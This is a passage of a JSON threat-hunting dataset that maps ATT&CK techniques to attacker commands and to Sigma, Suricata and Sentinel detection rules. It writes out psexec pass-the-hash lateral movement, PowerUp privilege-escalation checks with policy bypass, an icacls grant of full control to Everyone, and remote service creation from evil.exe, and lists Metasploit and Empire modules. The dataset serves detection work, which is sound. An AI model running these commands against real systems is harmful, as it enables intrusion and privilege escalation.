Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "status": "experimental", + "tags": [ + "attack.persistence", + "attack.t1136" + ], + "references": [ + "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/" + ], + "author": "Patrick Bareiss", + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4720 + }, + "condition": "selection" + }, + "fields": [ + "EventCode", + "AccountName", + "AccountDomain" + ], + "falsepositives": [ + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" + ], + "level": "low" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Windows event logs" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Windows event logs" + ], + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account creation", + "description": "A user account was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "user" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + 
"collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "Lat. Mov. and Execution:", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "Category": "Lat. Mov. 
and Execution:", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1077\nT1035", + "command_list": [ + "psexec is part of the SysInternals suite. It's not on systems by default, but it is likely to be a trusted executable, especially on sysadmin boxes where other SysInternals tools already exist:\n\npsexec /accepteula \\\\ip -u domain\\user -p password -c -f \\\\smbip\\share\\file.exe (Copy and execute file.exe on the remote system)\npsexec /accepteula \\\\ip -u domain\\user -p lm:ntlm cmd.exe /c dir c:\\Progra~1 (Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)\npsexec /accepteula \\\\ip -s cmd.exe (Run cmd.exe on the remote box as the SYSTEM user account)", + "psexec COMP_NAME {listener name} (via sc)\npsexec_sh COMP_NAME {listener name} (via powershell)", + "PSEXEC Modules:\nexploit/windows/smb/psexec\nexploit/windows/local/current_user_psexec\nauxiliary/admin/smb/psexec_command\nauxiliary/scanner/smb/psexec_loggedin_users\nexploit/windows/smb/psexec_psh" + ], + "commands": [ + { + "command": "psexec is part of the SysInternals suite. 
It's not on systems by default, but it is likely to be a trusted executable, especially on sysadmin boxes where other SysInternals tools already exist:\n\npsexec /accepteula \\\\ip -u domain\\user -p password -c -f \\\\smbip\\share\\file.exe (Copy and execute file.exe on the remote system)\npsexec /accepteula \\\\ip -u domain\\user -p lm:ntlm cmd.exe /c dir c:\\Progra~1 (Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)\npsexec /accepteula \\\\ip -s cmd.exe (Run cmd.exe on the remote box as the SYSTEM user account)", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "psexec COMP_NAME {listener name} (via sc)\npsexec_sh COMP_NAME {listener name} (via powershell)", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "PSEXEC Modules:\nexploit/windows/smb/psexec\nexploit/windows/local/current_user_psexec\nauxiliary/admin/smb/psexec_command\nauxiliary/scanner/smb/psexec_loggedin_users\nexploit/windows/smb/psexec_psh", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + } + ], + "parsed_datasets": [ + { + "Category": "T1077\nT1035", + "Built-in Windows Command": "psexec is part of the SysInternals suite. 
It's not on systems by default, but it is likely to be a trusted executable, especially on sysadmin boxes where other SysInternals tools already exist:\n\npsexec /accepteula \\\\ip -u domain\\user -p password -c -f \\\\smbip\\share\\file.exe (Copy and execute file.exe on the remote system)\npsexec /accepteula \\\\ip -u domain\\user -p lm:ntlm cmd.exe /c dir c:\\Progra~1 (Run cmd.exe on the remote system using the lm:ntlm password hash - aka pass the hash)\npsexec /accepteula \\\\ip -s cmd.exe (Run cmd.exe on the remote box as the SYSTEM user account)", + "Cobalt Strike": "psexec COMP_NAME {listener name} (via sc)\npsexec_sh COMP_NAME {listener name} (via powershell)", + "Metasploit": "PSEXEC Modules:\nexploit/windows/smb/psexec\nexploit/windows/local/current_user_psexec\nauxiliary/admin/smb/psexec_command\nauxiliary/scanner/smb/psexec_loggedin_users\nexploit/windows/smb/psexec_psh", + "Description": "psexec copies over a file to the remote box via SMB, then creates a service (usually a randomly named one) which points to the binary that was just copied over, starts the service, then deletes the service. Depending on the version of psexec, it might also migrate out of the initial process and delete the file that was copied over too. This is very similar to the previously mentioned technique of creating a service remotely, but the operator has much less control over the parameters" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "Approved for Public Release; Distribution Unlimited. Case Number 17-3569. \u00a92018 The MITRE Corporation. All Rights Reserved\n", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "Category": "Approved for Public Release; Distribution Unlimited. Case Number 17-3569. \u00a92018 The MITRE Corporation. 
All Rights Reserved\n", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1044", + "command_list": [ + "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "exploit/windows/local/trusted_service_path", + "*.exe /grant Everyone:F /T /C /Q ", + "icacls.exe", + "python/situational_awareness/host/multi/SuidGuidSearch", + "python/situational_awareness/host/multi/WorldWriteableFileSearch" + ], + "commands": [ + { + "command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "exploit/windows/local/trusted_service_path", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "*.exe /grant Everyone:F /T /C /Q ", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "icacls.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "python/situational_awareness/host/multi/SuidGuidSearch", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/host/multi/WorldWriteableFileSearch", + "source": 
"https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1044", + "Built-in Windows Command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "Cobalt Strike": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "Metasploit": "exploit/windows/local/trusted_service_path", + "Description": "PowerUp.ps1 is a powershell script from the PowerSploit project on github by PowershellMafia. The Invoke-AllChecks commandlet checks for many common privilege escalation options such as unquoted service paths, writeable service directories, service information manipulation, always install elevated, etc. Each specific kind of escalation technique supplies its own method of abusing it." + }, + { + "chain_id": "100125", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "/grant Everyone:F /T /C /Q ", + "sub_process_1": "icacls.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "file_systems_permissions_weakness", + "mitre_attack": "T1044", + "itw_sample": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + }, + { + "Empire Module": "python/situational_awareness/host/multi/SuidGuidSearch", + "ATT&CK Technique #1": "T1044", + "ATT&CK Technique #2": "", + "Technique": "File System Permissions Weakness", + "Concatenate for Python Dictionary": "\"python/situational_awareness/host/multi/SuidGuidSearch\": [\"T1044\"]," + }, + { + "Empire Module": "python/situational_awareness/host/multi/WorldWriteableFileSearch", + "ATT&CK Technique #1": "T1044", + "ATT&CK Technique #2": "", + "Technique": "File System Permissions Weakness", + "Concatenate for Python Dictionary": 
"\"python/situational_awareness/host/multi/WorldWriteableFileSearch\": [\"T1044\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 7 and (module_loaded contains \"\\\\Temp\\\\\"or module_loaded contains \"C:\\\\Users\\\\\"or driver_signature_status !contains \"Valid\")", + "name": "File System Permissions Weakness" + } + ], + "possible_detections": [ + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "7040", + " 7045", + "Services" + ], + [ + "4663", + "File monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "7040", + " 7045", + "Services" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1034", + "command_list": [ + "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "exploit/windows/local/trusted_service_path", + "powershell/privesc/powerup/allchecks" + ], + "commands": [ + { + "command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "exploit/windows/local/trusted_service_path", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "powershell/privesc/powerup/allchecks", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1034", + "Built-in 
Windows Command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "Cobalt Strike": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "Metasploit": "exploit/windows/local/trusted_service_path", + "Description": "PowerUp.ps1 is a powershell script from the PowerSploit project on github by PowershellMafia. The Invoke-AllChecks commandlet checks for many common privilege escalation options such as unquoted service paths, writeable service directories, service information manipulation, always install elevated, etc. Each specific kind of escalation technique supplies its own method of abusing it." + }, + { + "Empire Module": "powershell/privesc/powerup/allchecks", + "ATT&CK Technique #1": "T1034", + "ATT&CK Technique #2": "T1044", + "Technique": "Path Interception", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/allchecks\": [\"T1034\",\"T1044\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "8000-8027", + " 866", + "Whitelist Failures" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "IDs ???", + "Whitelist Failures" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1058", + "command_list": [ + "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "exploit/windows/local/trusted_service_path" + ], + "commands": [ + { + "command": "Check for common privilege escalation 
methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "exploit/windows/local/trusted_service_path", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + } + ], + "parsed_datasets": [ + { + "Category": "T1058", + "Built-in Windows Command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "Cobalt Strike": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "Metasploit": "exploit/windows/local/trusted_service_path", + "Description": "PowerUp.ps1 is a powershell script from the PowerSploit project on github by PowershellMafia. The Invoke-AllChecks commandlet checks for many common privilege escalation options such as unquoted service paths, writeable service directories, service information manipulation, always install elevated, etc. Each specific kind of escalation technique supplies its own method of abusing it." 
+ } + ], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "7040", + " 7045", + "Services" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "7040", + " 7045", + "Services" + ], + [ + "4657", + "Windows Registry" + ] + ], + "external_reference": [] + }, + { + "technique_id": "T1038", + "command_list": [ + "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "exploit/windows/local/trusted_service_path", + "powershell/privesc/powerup/find_dllhijack", + "powershell/privesc/powerup/write_dllhijacker" + ], + "commands": [ + { + "command": "Check for common privilege escalation methods:\n*upload PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "exploit/windows/local/trusted_service_path", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "powershell/privesc/powerup/find_dllhijack", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/powerup/write_dllhijacker", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1038", + "Built-in Windows Command": "Check for common privilege escalation methods:\n*upload 
PowerUp.ps1 to victim disk*\npowershell.exe -epbypass PowerUp.ps1\nInvoke-AllChecks", + "Cobalt Strike": "powershell-import /path/to/PowerUp.ps1\npowershell Invoke-AllChecks", + "Metasploit": "exploit/windows/local/trusted_service_path", + "Description": "PowerUp.ps1 is a powershell script from the PowerSploit project on github by PowershellMafia. The Invoke-AllChecks commandlet checks for many common privilege escalation options such as unquoted service paths, writeable service directories, service information manipulation, always install elevated, etc. Each specific kind of escalation technique supplies its own method of abusing it." + }, + { + "Empire Module": "powershell/privesc/powerup/find_dllhijack", + "ATT&CK Technique #1": "T1038", + "ATT&CK Technique #2": "", + "Technique": "DLL Search Order Hijacking", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/find_dllhijack\": [\"T1038\"]," + }, + { + "Empire Module": "powershell/privesc/powerup/write_dllhijacker", + "ATT&CK Technique #1": "T1038", + "ATT&CK Technique #2": "", + "Technique": "DLL Search Order Hijacking", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/write_dllhijacker\": [\"T1038\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon - ID 7", + "DLL monitoring" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Sysmon - ID 7", + "DLL monitoring" + ] + ], + "external_reference": [ + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf" + ] + }, + { + "technique_id": "T1035", + "command_list": [ + "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" 
/user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv", + "!=wininit", + "services.exe", + "*.exe", + "pcalua.exe", + "\\\\Windows\\\\.+\\\\sc.exestart|create|query|config", + "\\SYSTEM\\CurrentControlSet\\services", + "\\SYSTEM\\CurrentControlSet\\services\\\\Windows\\\\.+\\\\lsass.exe|\\\\Windows\\\\.+\\\\svchost.exe", + "powershell/lateral_movement/invoke_psexec" + ], + "commands": [ + { + "command": "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "!=wininit", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "services.exe", + 
"source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "*.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "pcalua.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "\\\\Windows\\\\.+\\\\sc.exestart|create|query|config", + "source": "SysmonHunter - Service Execution", + "name": "" + }, + { + "command": "\\SYSTEM\\CurrentControlSet\\services", + "source": "SysmonHunter - Service Execution", + "name": "" + }, + { + "command": "\\SYSTEM\\CurrentControlSet\\services\\\\Windows\\\\.+\\\\lsass.exe|\\\\Windows\\\\.+\\\\svchost.exe", + "source": "SysmonHunter - Service Execution", + "name": "" + }, + { + "command": "powershell/lateral_movement/invoke_psexec", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1035", + "Built-in Windows Command": "Creating a new service remotely:\nnet use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\ncopy evil.exe \\\\COMP\\ADMIN$\\System32\\acachsrv.exe\nsc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto DisplayName= \"DisplayName\"\nsc \\\\COMP start acachsrv", + "Cobalt Strike": "Creating a new service remotely:\nshell net use \\\\COMP\\ADMIN$ \"password\" /user:DOMAIN_NAME\\UserName\nshell copy evil.exe \\\\COMP\\ADMIN$\\acachsrv.exe\nshell sc \\\\COMP create acachsrv binPath= \"C:\\Windows\\System32\\acachsrv.exe\" start= auto description= \"Description here\" DisplayName= \"DisplayName\"\nshell sc \\\\COMP start acachsrv", + "Metasploit": "", + "Description": "This technique creates a new service on the remote machine. It's important to note the spaces after the = in these commands! 
Also, before starting the service, run the following commands to make sure everything is set up properly:\nsc \\\\COMP qc acachsrv\ndir \\\\COMP\\ADMIN$\\acachsrv.exe" + }, + { + "chain_id": "100076", + "os": "windows", + "parent_process": "!=wininit", + "commandline_string": "", + "sub_process_1": "services.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "service_execution", + "mitre_attack": "T1035", + "itw_sample": "" + }, + { + "chain_id": "100124", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "", + "sub_process_1": "pcalua.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "service_execution", + "mitre_attack": "T1035", + "itw_sample": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Sobnot.A" + }, + { + "name": "Service Execution", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\sc.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "start|create|query|config" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\SYSTEM\\CurrentControlSet\\services" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SYSTEM\\CurrentControlSet\\services" + } + }, + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\lsass.exe|\\\\Windows\\\\.+\\\\svchost.exe", + "flag": "regex", + "op": "not" + } + }, + "op": "and" + } + ] + }, + { + "Empire Module": "powershell/lateral_movement/invoke_psexec", + "ATT&CK Technique #1": "T1035", + "ATT&CK Technique #2": "T1077", + "Technique": "Service Execution\u00a0", + "Concatenate for Python Dictionary": 
"\"powershell/lateral_movement/invoke_psexec\": [\"T1035\",\"T1077\"]," + }, + { + "Rules": "ET Open", + "SID": "2026879", + "Signature": "ET POLICY Possible winexe over SMB - Possible Lateral Movement", + "Verified": "YES" + }, + { + "Rules": "ET Open", + "SID": "2010781", + "Signature": "ET POLICY PsExec service created", + "Verified": "YES" + } + ], + "queries": [ + { + "product": "Suricata (NSM)", + "query": "ET POLICY Possible winexe over SMB - Possible Lateral Movement", + "name": "ET Open Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY PsExec service created", + "name": "ET Open Rule" + } + ], + "possible_detections": [ + { + "title": "smbexec.py Service Installation", + "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "description": "Detects the use of smbexec.py tool by detecting a specific service installation", + "author": "Omer Faruk Celik", + "date": "2018/03/20", + "references": [ + "https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/" + ], + "tags": [ + "attack.lateral_movement", + "attack.execution", + "attack.t1077", + "attack.t1035" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "service_installation": { + "EventID": 7045, + "ServiceName": "BTOBTO", + "ServiceFileName": "*\\execute.bat" + }, + "condition": "service_installation" + }, + "fields": [ + "ServiceName", + "ServiceFileName" + ], + "falsepositives": [ + "Penetration Test", + "Unknown" + ], + "level": "critical" + }, + { + "title": "PsExec Service Start", + "id": "3ede524d-21cc-472d-a3ce-d21b568d8db7", + "description": "Detects a PsExec service start", + "author": "Florian Roth", + "date": "2018/03/13", + "modified": "2012/12/11", + "tags": [ + "attack.execution", + "attack.t1035", + "attack.s0029" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ProcessCommandLine": "C:\\Windows\\PSEXESVC.exe" + }, + "condition": 
"selection" + }, + "falsepositives": [ + "Administrative activity" + ], + "level": "low" + }, + { + "title": "Service Execution", + "id": "2a072a96-a086-49fa-bcb5-15cc5a619093", + "status": "experimental", + "description": "Detects manual service execution (start) via system utilities", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1035/T1035.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": [ + "\\net.exe", + "\\net1.exe" + ], + "CommandLine|contains": " start " + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate administrator or user executes a service for legitimate reason" + ], + "level": "low", + "tags": [ + "attack.execution", + "attack.t1035" + ] + }, + { + "action": "global", + "title": "PsExec Tool Execution", + "id": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "status": "experimental", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Thomas Patzke", + "references": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet" + ], + "tags": [ + "attack.execution", + "attack.t1035", + "attack.s0029" + ], + "detection": { + "condition": "1 of them" + }, + "fields": [ + "EventID", + "CommandLine", + "ParentCommandLine", + "ServiceName", + "ServiceFileName" + ], + "falsepositives": [ + "unknown" + ], + "level": "low" + }, + { + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "service_installation": { + "EventID": 7045, + "ServiceName": "PSEXESVC", + "ServiceFileName": "*\\PSEXESVC.exe" + }, + "service_execution": { + "EventID": 7036, + "ServiceName": "PSEXESVC" + } + } + }, + { + "logsource": { + "category": "process_creation", + 
